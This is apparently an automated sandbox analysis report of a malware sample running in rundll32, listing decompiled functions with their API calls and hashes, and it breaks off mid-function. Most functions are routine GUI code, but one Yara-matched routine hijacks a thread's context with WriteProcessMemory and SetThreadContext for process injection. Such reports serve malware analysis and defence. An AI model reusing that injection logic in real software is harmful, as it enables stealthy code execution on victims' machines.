                          • Instruction Fuzzy Hash: F2211FBAE10109FBCB14EFE8D9849AEB778AF48215F108694E915E3241E635EA00DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0281D3B8(intOrPtr __eax, char __edx) {
                          				intOrPtr _v8;
                          				char _v9;
                          				intOrPtr _v16;
                          				char _v20;
                          				void* _v24;
                          				intOrPtr _t36;
                          				intOrPtr _t38;
                          				intOrPtr _t53;
                          
                          				_v9 = __edx;
                          				_v8 = __eax;
                          				_t36 =  *0x2865b58; // 0x41d1544
                          				if( *((intOrPtr*)(_t36 + 0x30)) != 0) {
                          					if( *((intOrPtr*)(_v8 + 0x94)) != 0) {
                          						L8:
                          						_t38 = _v8;
                          						 *((intOrPtr*)(_t38 + 0x94)) =  *((intOrPtr*)(_t38 + 0x94)) + 1;
                          						return _t38;
                          					}
                          					_v24 =  *((intOrPtr*)(_v8 + 0x30));
                          					_v20 = _v9;
                          					EnumWindows(E0281D338,  &_v24);
                          					if( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x90)) + 8)) == 0) {
                          						goto L8;
                          					}
                          					_v24 = GetWindow(_v24, 3);
                          					if((GetWindowLongA(_v24, 0xffffffec) & 0x00000008) != 0) {
                          						_v24 = 0xfffffffe;
                          					}
                          					_t53 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x90)) + 8)) - 1;
                          					if(_t53 >= 0) {
                          						_v16 = _t53;
                          						do {
                          							SetWindowPos(E027EB1E0( *((intOrPtr*)(_v8 + 0x90)), _v16), _v24, 0, 0, 0, 0, 0x213);
                          							_v16 = _v16 - 1;
                          						} while (_v16 != 0xffffffff);
                          					}
                          					goto L8;
                          				}
                          				return _t36;
                          			}












                          APIs
                          • EnumWindows.USER32(0281D338,0281DE90), ref: 0281D3FB
                          • GetWindow.USER32(0281DE90,00000003), ref: 0281D415
                          • GetWindowLongA.USER32(0281DE90,000000EC), ref: 0281D423
                          • SetWindowPos.USER32(00000000,0281DE90,00000000,00000000,00000000,00000000,00000213,0281DE90,000000EC,0281DE90,00000003,0281D338,0281DE90), ref: 0281D46B
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$EnumLongWindows
                          • String ID:
                          • API String ID: 4191631535-0
                          • Opcode ID: 8655fa0d0f3f9516eea758dd10ec906880677037d0fa1698ab17deb48ddaa4d4
                          • Instruction ID: 20e7ff976a4a41e1658ff285a13a28ef25a250833bd1c78cd9869f0c73c9e4a4
                          • Opcode Fuzzy Hash: 8655fa0d0f3f9516eea758dd10ec906880677037d0fa1698ab17deb48ddaa4d4
                          • Instruction Fuzzy Hash: 0F21EC78900208EFDB15DBA8C989FADB7B9EB04314F6441A4E958EB2D1C374AE40CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E027F49B4(intOrPtr _a4, short _a6, intOrPtr _a8) {
                          				struct _WNDCLASSA _v44;
                          				struct HINSTANCE__* _t6;
                          				CHAR* _t8;
                          				struct HINSTANCE__* _t9;
                          				int _t10;
                          				void* _t11;
                          				struct HINSTANCE__* _t13;
                          				struct HINSTANCE__* _t19;
                          				CHAR* _t20;
                          				struct HWND__* _t22;
                          				CHAR* _t24;
                          
                          				_t6 =  *0x2865668; // 0x27d0000
                          				 *0x28635d0 = _t6;
                          				_t8 =  *0x28635e4; // 0x27f49a4
                          				_t9 =  *0x2865668; // 0x27d0000
                          				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
                          				asm("sbb eax, eax");
                          				_t11 = _t10 + 1;
                          				if(_t11 == 0 || L027D6A3C != _v44.lpfnWndProc) {
                          					if(_t11 != 0) {
                          						_t19 =  *0x2865668; // 0x27d0000
                          						_t20 =  *0x28635e4; // 0x27f49a4
                          						UnregisterClassA(_t20, _t19);
                          					}
                          					RegisterClassA(0x28635c0);
                          				}
                          				_t13 =  *0x2865668; // 0x27d0000
                          				_t24 =  *0x28635e4; // 0x27f49a4
                          				_t22 = E027D6FCC(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
                          				if(_a6 != 0) {
                          					SetWindowLongA(_t22, 0xfffffffc, E027F48F8(_a4, _a8));
                          				}
                          				return _t22;
                          			}















                          APIs
                          • GetClassInfoA.USER32(027D0000,027F49A4,?), ref: 027F49D5
                          • UnregisterClassA.USER32(027F49A4,027D0000), ref: 027F49FE
                          • RegisterClassA.USER32(028635C0), ref: 027F4A08
                          • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 027F4A53
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Class$InfoLongRegisterUnregisterWindow
                          • String ID:
                          • API String ID: 4025006896-0
                          • Opcode ID: 754a6649b47e56f59b891558f9b1acddf5366326bb7c4faf121789afd139d264
                          • Instruction ID: 15d60ae16c55caf40cd5e2012a239915ea24d2a42de55fc797a4bec682d749d4
                          • Opcode Fuzzy Hash: 754a6649b47e56f59b891558f9b1acddf5366326bb7c4faf121789afd139d264
                          • Instruction Fuzzy Hash: 6A01AD75A44200ABCA41EAA8EC8DF9B33ADA709704F005611FB15D73D0DB26D854CB69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E0282C9F4(intOrPtr* __eax, signed int __edx) {
                          				void* _t22;
                          				struct HPALETTE__* _t29;
                          				struct HPALETTE__* _t30;
                          				struct HDC__* _t32;
                          				intOrPtr* _t33;
                          				void* _t34;
                          				signed int* _t35;
                          
                          				_t35 = _t34 + 0xfffffff8;
                          				 *_t35 = __edx;
                          				_t33 = __eax;
                          				_t22 = 0;
                          				_t36 =  *((char*)(__eax + 0x57));
                          				if( *((char*)(__eax + 0x57)) != 0) {
                          					_t29 = E027D3408(__eax, _t36);
                          					if(_t29 != 0) {
                          						_t32 =  *((intOrPtr*)( *_t33 + 0x48))();
                          						asm("sbb eax, eax");
                          						_t30 = SelectPalette(_t32, _t29,  ~( *_t35 ^ 0x00000001));
                          						if(RealizePalette(_t32) != 0) {
                          							 *((intOrPtr*)( *_t33 + 0x7c))();
                          						}
                          						SelectPalette(_t32, _t30, 0xffffffff);
                          						ReleaseDC(_t35[2], _t32);
                          						_t22 = 1;
                          					}
                          				}
                          				return _t22;
                          			}











                          APIs
                          • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0282CA32
                          • RealizePalette.GDI32(00000000), ref: 0282CA3A
                          • SelectPalette.GDI32(00000000,00000000,000000FF), ref: 0282CA4E
                          • ReleaseDC.USER32(00000000,00000000), ref: 0282CA59
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Palette$Select$RealizeRelease
                          • String ID:
                          • API String ID: 4122334046-0
                          • Opcode ID: bb58b4cd4bebd9edfe325534b157e65b25facd398a44339e2568feb8b0bf4df2
                          • Instruction ID: d87b3b53f7a92b2c878e8911ae4ea188ffeae2eb095947b81f8ed49484c93259
                          • Opcode Fuzzy Hash: bb58b4cd4bebd9edfe325534b157e65b25facd398a44339e2568feb8b0bf4df2
                          • Instruction Fuzzy Hash: 8D01D43A2092542E9712A63D9C088BB7BEDCF83A64B15027CF455C7280DE219C49C765
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E042D37E0(void* _a4, void* _a8, void _a12, intOrPtr _a16) {
                          				struct _CONTEXT _v720;
                          
                          				_v720.ContextFlags = 0x10002;
                          				E042D14A0( &(_v720.Dr0), 0, 0x2c8);
                          				if(GetThreadContext(_a8,  &_v720) != 0) {
                          					if(WriteProcessMemory(_a4, _v720.Ebx + 8,  &_a12, 4, 0) != 0) {
                          						_v720.Eax = _a16;
                          						if(SetThreadContext(_a8,  &_v720) != 0) {
                          							ResumeThread(_a8);
                          							return 1;
                          						}
                          						return 0;
                          					}
                          					return 0;
                          				}
                          				return 0;
                          			}





                          APIs
                          • GetThreadContext.KERNEL32(042D1ECF,00010002), ref: 042D3814
                          • WriteProcessMemory.KERNEL32(?,?,00500000,00000004,00000000), ref: 042D3838
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ContextMemoryProcessThreadWrite
                          • String ID:
                          • API String ID: 2099319263-0
                          • Opcode ID: ce97a4adced3c2ddd13ebfe76369b18465316f8f6cd8e6aad8b4819865b5ca6c
                          • Instruction ID: 94f43bee1bbcde42db271139afc72184de7d89a2b153872d38741518846c3602
                          • Opcode Fuzzy Hash: ce97a4adced3c2ddd13ebfe76369b18465316f8f6cd8e6aad8b4819865b5ca6c
                          • Instruction Fuzzy Hash: AF1184B5B15109ABEB14DF64EC49FBE33B8AB08745F008568FE09D7180E674E940CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E027D1ABC() {
                          				signed int _t13;
                          				intOrPtr _t19;
                          				intOrPtr _t20;
                          				intOrPtr _t23;
                          
                          				_push(_t23);
                          				_push(E027D1B72);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t23;
                          				_push(0x28655cc);
                          				L027D1410();
                          				if( *0x286504d != 0) {
                          					_push(0x28655cc);
                          					L027D1418();
                          				}
                          				E027D1480(0x28655ec);
                          				E027D1480(0x28655fc);
                          				E027D1480(0x2865628);
                          				 *0x2865624 = LocalAlloc(0, 0xff8);
                          				if( *0x2865624 != 0) {
                          					_t13 = 3;
                          					do {
                          						_t20 =  *0x2865624; // 0x2916550
                          						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                          						_t13 = _t13 + 1;
                          					} while (_t13 != 0x401);
                          					 *((intOrPtr*)(0x2865610)) = 0x286560c;
                          					 *0x286560c = 0x286560c;
                          					 *0x2865618 = 0x286560c;
                          					 *0x28655c4 = 1;
                          				}
                          				_pop(_t19);
                          				 *[fs:eax] = _t19;
                          				_push(E027D1B79);
                          				if( *0x286504d != 0) {
                          					_push(0x28655cc);
                          					L027D1420();
                          					return 0;
                          				}
                          				return 0;
                          			}








                          APIs
                          • RtlInitializeCriticalSection.KERNEL32(028655CC,00000000,027D1B72,?,?,027D2356), ref: 027D1AD2
                          • RtlEnterCriticalSection.KERNEL32(028655CC,028655CC,00000000,027D1B72,?,?,027D2356), ref: 027D1AE5
                          • LocalAlloc.KERNEL32(00000000,00000FF8,028655CC,00000000,027D1B72,?,?,027D2356), ref: 027D1B0F
                          • RtlLeaveCriticalSection.KERNEL32(028655CC,027D1B79,00000000,027D1B72,?,?,027D2356), ref: 027D1B6C
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                          • String ID:
                          • API String ID: 730355536-0
                          • Opcode ID: 32317aae611a31233dcb041842bfe503e224913980d8f28521350cd8e8518989
                          • Instruction ID: 56d350ca89908718a6a31741da926694b0b79a32b3f07ab732d42bf246a334dd
                          • Opcode Fuzzy Hash: 32317aae611a31233dcb041842bfe503e224913980d8f28521350cd8e8518989
                          • Instruction Fuzzy Hash: D001B5BCA843409EF316ABAC941EB293BE6D749704FC09868E149CB6C1D7BC9450CF65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0281CAF4() {
                          				long _v8;
                          				void* _t3;
                          				void* _t5;
                          
                          				_t3 =  *0x2865b58; // 0x41d1544
                          				if( *((char*)(_t3 + 0xa5)) == 0) {
                          					if( *0x2865b70 == 0) {
                          						_t3 = SetWindowsHookExA(3, E0281CAB0, 0, GetCurrentThreadId());
                          						 *0x2865b70 = _t3;
                          					}
                          					if( *0x2865b6c == 0) {
                          						_t3 = CreateEventA(0, 0, 0, 0);
                          						 *0x2865b6c = _t3;
                          					}
                          					if( *0x2865b74 == 0) {
                          						_t5 = CreateThread(0, 0x3e8, E0281CA50, 0, 0,  &_v8);
                          						 *0x2865b74 = _t5;
                          						return _t5;
                          					}
                          				}
                          				return _t3;
                          			}







                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 0281CB0F
                          • SetWindowsHookExA.USER32(00000003,0281CAB0,00000000,00000000), ref: 0281CB1F
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,0281FAA8), ref: 0281CB3A
                          • CreateThread.KERNEL32(00000000,000003E8,0281CA50,00000000,00000000,?), ref: 0281CB61
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CreateThread$CurrentEventHookWindows
                          • String ID:
                          • API String ID: 1195359707-0
                          • Opcode ID: b50a81c38729d2c8eaa677257d5ea2e39ac77d3febebec35916f787ce1a41bfc
                          • Instruction ID: 41d86bbe0ca874cf378046d1d5b9b4486ed4dd30e0404666fadd83780f13270f
                          • Opcode Fuzzy Hash: b50a81c38729d2c8eaa677257d5ea2e39ac77d3febebec35916f787ce1a41bfc
                          • Instruction Fuzzy Hash: 41F0FFFCAC4355AEF611EB60AC0AF2536AC9300F11F901556F309DA1C0C7A965548F1A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E0282B48C(struct HWND__* __eax, void* __ecx) {
                          				intOrPtr _t9;
                          				signed int _t16;
                          				struct HWND__* _t19;
                          				DWORD* _t20;
                          
                          				_t17 = __ecx;
                          				_push(__ecx);
                          				_t19 = __eax;
                          				_t16 = 0;
                          				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
                          					_t9 =  *0x2865ba4; // 0x41d10ac
                          					if(GlobalFindAtomA(E027D45A8(_t9)) !=  *0x2865ba0) {
                          						_t16 = 0 | E0282A57C(_t19, _t17) != 0x00000000;
                          					} else {
                          						_t16 = 0 | GetPropA(_t19,  *0x2865ba0 & 0x0000ffff) != 0x00000000;
                          					}
                          				}
                          				return _t16;
                          			}








                          APIs
                          • GetWindowThreadProcessId.USER32(00000000), ref: 0282B499
                          • GetCurrentProcessId.KERNEL32(00000000,?,?,02865BC0,00000000,0282B504,0282B2C6,02865BD8,00000000,0282B0B6,?,02865BC0,?), ref: 0282B4A2
                          • GlobalFindAtomA.KERNEL32(00000000), ref: 0282B4B7
                          • GetPropA.USER32(00000000,00000000), ref: 0282B4CE
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                          • String ID:
                          • API String ID: 2582817389-0
                          • Opcode ID: ea221d03c97d01c4ce849bab76e4be4b34515924221ecdcfbaf30ee521ed8e11
                          • Instruction ID: 8a0d7cd387b4a7abf18a7380e48b547482089aed6fa12df062dc832c92449fb6
                          • Opcode Fuzzy Hash: ea221d03c97d01c4ce849bab76e4be4b34515924221ecdcfbaf30ee521ed8e11
                          • Instruction Fuzzy Hash: 43F0E5AD64B1326B56327775ADC8A7F13ADDE00368BC48421FC44C6041EB24CCD5CAB1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0281E140(int __eax) {
                          				int _v8;
                          				struct HWND__* _v12;
                          				int _t15;
                          
                          				_v8 = __eax;
                          				_t15 = _v8;
                          				if( *((intOrPtr*)(_t15 + 0x30)) != 0) {
                          					_t15 = GetLastActivePopup( *(_v8 + 0x30));
                          					_v12 = _t15;
                          					if(_v12 != 0) {
                          						_t15 = _v12;
                          						if(_t15 !=  *(_v8 + 0x30)) {
                          							_t15 = IsWindowVisible(_v12);
                          							if(_t15 != 0) {
                          								_t15 = IsWindowEnabled(_v12);
                          								if(_t15 != 0) {
                          									_t15 = SetForegroundWindow(_v12);
                          								}
                          							}
                          						}
                          					}
                          				}
                          				return _t15;
                          			}







                          APIs
                          • GetLastActivePopup.USER32(00000000), ref: 0281E159
                          • IsWindowVisible.USER32(00000000), ref: 0281E176
                          • IsWindowEnabled.USER32(00000000), ref: 0281E183
                          • SetForegroundWindow.USER32(00000000), ref: 0281E190
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                          • String ID:
                          • API String ID: 2280970139-0
                          • Opcode ID: 418d1c1c4744b93ebb7d3ba8d3e3d2ef3a33544132930ece1c961c045ef27c35
                          • Instruction ID: 9ee65c9a8808e7f9816f5b6eb02c1777ee96550f0dc494cd0b771ca83b444c42
                          • Opcode Fuzzy Hash: 418d1c1c4744b93ebb7d3ba8d3e3d2ef3a33544132930ece1c961c045ef27c35
                          • Instruction Fuzzy Hash: DDF0AF79910208EFDB55DFE9D988A9D7BBEAF04315F540994A904EB281DB34EA80CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E0282A5B0(struct HWND__* __eax, void* __ecx) {
                          				intOrPtr _t5;
                          				struct HWND__* _t12;
                          				void* _t15;
                          				DWORD* _t16;
                          
                          				_t13 = __ecx;
                          				_push(__ecx);
                          				_t12 = __eax;
                          				_t15 = 0;
                          				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
                          					_t5 =  *0x2865ba8; // 0x41d10c8
                          					if(GlobalFindAtomA(E027D45A8(_t5)) !=  *0x2865ba2) {
                          						_t15 = E0282A57C(_t12, _t13);
                          					} else {
                          						_t15 = GetPropA(_t12,  *0x2865ba2 & 0x0000ffff);
                          					}
                          				}
                          				return _t15;
                          			}








                          APIs
                          • GetWindowThreadProcessId.USER32(?), ref: 0282A5BD
                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,028272D1,00000000,02826E34,?,00000000,028175E4,00000000), ref: 0282A5C6
                          • GlobalFindAtomA.KERNEL32(00000000), ref: 0282A5DB
                          • GetPropA.USER32(?,00000000), ref: 0282A5F2
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                          • String ID:
                          • API String ID: 2582817389-0
                          • Opcode ID: b38c653446cd32a3e7655dff8a212e28da4ca95193f3d6d1f97166c65a2b0071
                          • Instruction ID: 9fb45feaccd7c8d078e8547fd519a587d387a7077b01fd0a4acb68a1cb91f773
                          • Opcode Fuzzy Hash: b38c653446cd32a3e7655dff8a212e28da4ca95193f3d6d1f97166c65a2b0071
                          • Instruction Fuzzy Hash: DBF0E5EE6001316ECA35B7BAADCC83761EDDF042A13000920F945C3642D728CCC48B70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027D6F2A(void* __eax, int __ecx, long __edx) {
                          				void* _t2;
                          				void* _t4;
                          
                          				_t2 = GlobalHandle(__eax);
                          				GlobalUnWire(_t2);
                          				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
                          				GlobalFix(_t4);
                          				return _t4;
                          			}






                          APIs
                          • GlobalHandle.KERNEL32 ref: 027D6F2F
                          • GlobalUnWire.KERNEL32(00000000), ref: 027D6F36
                          • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 027D6F3B
                          • GlobalFix.KERNEL32(00000000), ref: 027D6F41
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Global$AllocHandleWire
                          • String ID:
                          • API String ID: 2210401237-0
                          • Opcode ID: 86b46a5ab506f311bf0838b411388cf6acfae71a8e913e3811583851ae27973b
                          • Instruction ID: ae5a3b484a4af6d00b35201216cdf5d141fe5b95c63de9558a066671b91462cd
                          • Opcode Fuzzy Hash: 86b46a5ab506f311bf0838b411388cf6acfae71a8e913e3811583851ae27973b
                          • Instruction Fuzzy Hash: ADB009CCA103417DAE0673B46D0DD3B057EDDA5B44391499A3808E2041EA6EEC000C3A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E027F74EC(void* __eax, void* __ebx, void* __ecx) {
                          				signed int _v8;
                          				struct tagLOGFONTA _v68;
                          				char _v72;
                          				char _v76;
                          				char _v80;
                          				intOrPtr _t76;
                          				intOrPtr _t81;
                          				void* _t107;
                          				void* _t116;
                          				intOrPtr _t126;
                          				void* _t137;
                          				void* _t138;
                          				intOrPtr _t139;
                          
                          				_t137 = _t138;
                          				_t139 = _t138 + 0xffffffb4;
                          				_v80 = 0;
                          				_v76 = 0;
                          				_v72 = 0;
                          				_t116 = __eax;
                          				_push(_t137);
                          				_push(0x27f7675);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t139;
                          				_v8 =  *((intOrPtr*)(__eax + 0x10));
                          				if( *((intOrPtr*)(_v8 + 8)) != 0) {
                          					 *[fs:eax] = 0;
                          					_push(0x27f767c);
                          					return E027D410C( &_v80, 3);
                          				} else {
                          					_t76 =  *0x2865914; // 0x41d0a30
                          					E027F6830(_t76);
                          					_push(_t137);
                          					_push(0x27f764d);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t139;
                          					if( *((intOrPtr*)(_v8 + 8)) == 0) {
                          						_v68.lfHeight =  *(_v8 + 0x14);
                          						_v68.lfWidth = 0;
                          						_v68.lfEscapement = 0;
                          						_v68.lfOrientation = 0;
                          						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
                          							_v68.lfWeight = 0x190;
                          						} else {
                          							_v68.lfWeight = 0x2bc;
                          						}
                          						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
                          						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
                          						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
                          						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
                          						E027D434C( &_v72, _v8 + 0x1b);
                          						if(E027D8338(_v72, "Default") != 0) {
                          							E027D434C( &_v80, _v8 + 0x1b);
                          							E027D8C20( &(_v68.lfFaceName), _v80);
                          						} else {
                          							E027D434C( &_v76, "\rMS Sans Serif");
                          							E027D8C20( &(_v68.lfFaceName), _v76);
                          						}
                          						_v68.lfQuality = 0;
                          						_v68.lfOutPrecision = 0;
                          						_v68.lfClipPrecision = 0;
                          						_t107 = E027F77D0(_t116) - 1;
                          						if(_t107 == 0) {
                          							_v68.lfPitchAndFamily = 2;
                          						} else {
                          							if(_t107 == 1) {
                          								_v68.lfPitchAndFamily = 1;
                          							} else {
                          								_v68.lfPitchAndFamily = 0;
                          							}
                          						}
                          						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
                          					}
                          					_pop(_t126);
                          					 *[fs:eax] = _t126;
                          					_push(0x27f7654);
                          					_t81 =  *0x2865914; // 0x41d0a30
                          					return E027F683C(_t81);
                          				}
                          			}

















                          APIs
                            • Part of subcall function 027F6830: RtlEnterCriticalSection.KERNEL32(?,027F686D), ref: 027F6834
                          • CreateFontIndirectA.GDI32(?), ref: 027F762A
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CreateCriticalEnterFontIndirectSection
                          • String ID: MS Sans Serif$Default
                          • API String ID: 2931345757-2137701257
                          • Opcode ID: aa65887423d7086f01e0f7d030e6c96b0315d7e09d895f68b8dac27c2d015549
                          • Instruction ID: b6619eddc27898aaa4066778fbd0ed8a3f070954cb140880093f959dc18fb247
                          • Opcode Fuzzy Hash: aa65887423d7086f01e0f7d030e6c96b0315d7e09d895f68b8dac27c2d015549
                          • Instruction Fuzzy Hash: 67515670A08288DFDB45CFA8D989BDDFBF6AF48304F6580A9D904A7352D3749E05CB25
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E02826A78(intOrPtr __eax, void* __edx) {
                          				char _v8;
                          				signed short _v10;
                          				intOrPtr _v16;
                          				char _v17;
                          				char _v24;
                          				intOrPtr _t34;
                          				intOrPtr _t40;
                          				intOrPtr _t42;
                          				intOrPtr _t48;
                          				void* _t51;
                          				intOrPtr _t64;
                          				intOrPtr _t67;
                          				void* _t69;
                          				void* _t71;
                          				intOrPtr _t72;
                          
                          				_t69 = _t71;
                          				_t72 = _t71 + 0xffffffec;
                          				_t51 = __edx;
                          				_v16 = __eax;
                          				_v10 =  *((intOrPtr*)(__edx + 4));
                          				if(_v10 == 0) {
                          					return 0;
                          				} else {
                          					if(GetKeyState(0x10) < 0) {
                          						_v10 = _v10 + 0x2000;
                          					}
                          					if(GetKeyState(0x11) < 0) {
                          						_v10 = _v10 + 0x4000;
                          					}
                          					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
                          						_v10 = _v10 + 0x8000;
                          					}
                          					_v24 =  *((intOrPtr*)(_v16 + 0x34));
                          					_t34 =  *0x2865b88; // 0x41d1e78
                          					E027FED14(_t34,  &_v24);
